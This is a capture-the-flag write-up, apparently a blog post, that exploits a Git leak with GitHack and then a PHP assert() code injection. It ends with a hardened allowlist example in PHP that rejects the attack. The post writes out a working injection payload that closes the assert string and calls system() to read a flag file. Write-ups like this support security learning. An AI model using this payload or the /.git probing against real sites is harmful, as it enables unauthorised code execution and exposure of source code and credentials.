Defense - MFW all over the world
2022-08-08 08:04:00 【stealth rookie】
Topics covered: Git leak vulnerability, code audit
Many developers currently use Git for version control and for automatic deployment of sites. If deployment is configured incorrectly, the .git folder may be published directly to the production environment. This is the Git leak vulnerability.
Impact
An attacker could exploit this vulnerability to download the entire contents of the .git folder. If the folder contains sensitive information such as the site source code or database account passwords, the attacker may be able to take control of the server directly.
The site appears to use Git, so a Git leak is possible; request /.git directly to check.
There is indeed a Git leak, so we use GitHack to restore the source.
Tool download (linux): git clone https://github.com/lijIEjIE/GitHack.git
The restored source contains flag.php in the templates directory, and the key code is in index.php.
The strpos() function looks for the first occurrence of ".." in $file. It returns false if not found.
The file_exists() function checks whether $file exists.
assert() evaluates the string in its parentheses as code and returns true or false.
The assert() call suggests a code execution vulnerability: $page is concatenated in directly, without any filtering. The goal is to use assert() to run cat ./templates/flag.php and get the flag, which means breaking out of the structure of the original assert statement.
The $file variable is built by concatenating the $page value we supply, with no filtering, so we can insert a call to system() into this input to execute a system command.
Note the single quotes and parentheses around $file where it is used; they delimit $file, so the payload has to close them.
Then we construct the following payload:
?page=') or system('cat ./templates/flag.php');//
After being passed in, it becomes:
$file="templates/') or system('cat ./templates/flag.php');//.php"
strpos() returns false, so the or causes system() to be executed, and " // " comments out the rest of the statement:
assert("strpos('templates/') or system('cat ./templates/flag.php');//.php', '..') === false")
Everything after the // is commented out, so the statement actually executed is:
strpos('templates/') or system('cat ./templates/flag.php');
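The hardened counterpart of the page lookup described above, as an added example that is not code from the original post or from the challenge: the ?page= value is checked against an allowlist and resolved as a path, and is never placed inside a string that gets evaluated. The function name resolve_template, the page names in ALLOWED_PAGES and the temporary demo directory are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical allowlist: the write-up does not list the site's real page names.
const ALLOWED_PAGES = ['home', 'about', 'contact'];

// Map a user-supplied ?page= value to a template path, or null if rejected.
// The value is only ever compared and used as data; it never reaches assert(),
// eval() or any other function that evaluates a string as code.
function resolve_template(string $page, string $baseDir): ?string
{
    // 1. Exact-match allowlist: quotes, parentheses, "/" and ".." cannot pass.
    if (!in_array($page, ALLOWED_PAGES, true)) {
        return null;
    }
    // 2. Defence in depth: canonicalise and confirm the file is inside $baseDir.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $page . '.php');
    if ($base === false || $path === false) {
        return null; // missing directory or template
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// Constructed demo data: a throwaway templates directory with two files.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'templates_demo_' . getmypid();
is_dir($dir) || mkdir($dir);
file_put_contents("$dir/home.php", "<?php echo 'home';");
file_put_contents("$dir/flag.php", "<?php // placeholder secret");

$inputs = [
    'home',                                          // allowed and present
    'about',                                         // allowed but no such file
    'flag',                                          // exists, not on the allowlist
    '../index',                                      // traversal attempt
    "') or system('cat ./templates/flag.php');//",   // payload from the write-up
];
foreach ($inputs as $in) {
    $hit = resolve_template($in, $dir);
    printf("%-48s => %s\n", var_export($in, true),
        $hit === null ? 'rejected' : 'serve ' . basename($hit));
}

// Remove the demo files again.
array_map('unlink', glob("$dir/*.php"));
rmdir($dir);
```

On PHP 8.0 and later assert() no longer evaluates string arguments, but the allowlist is still needed because the same value is used to build a file path.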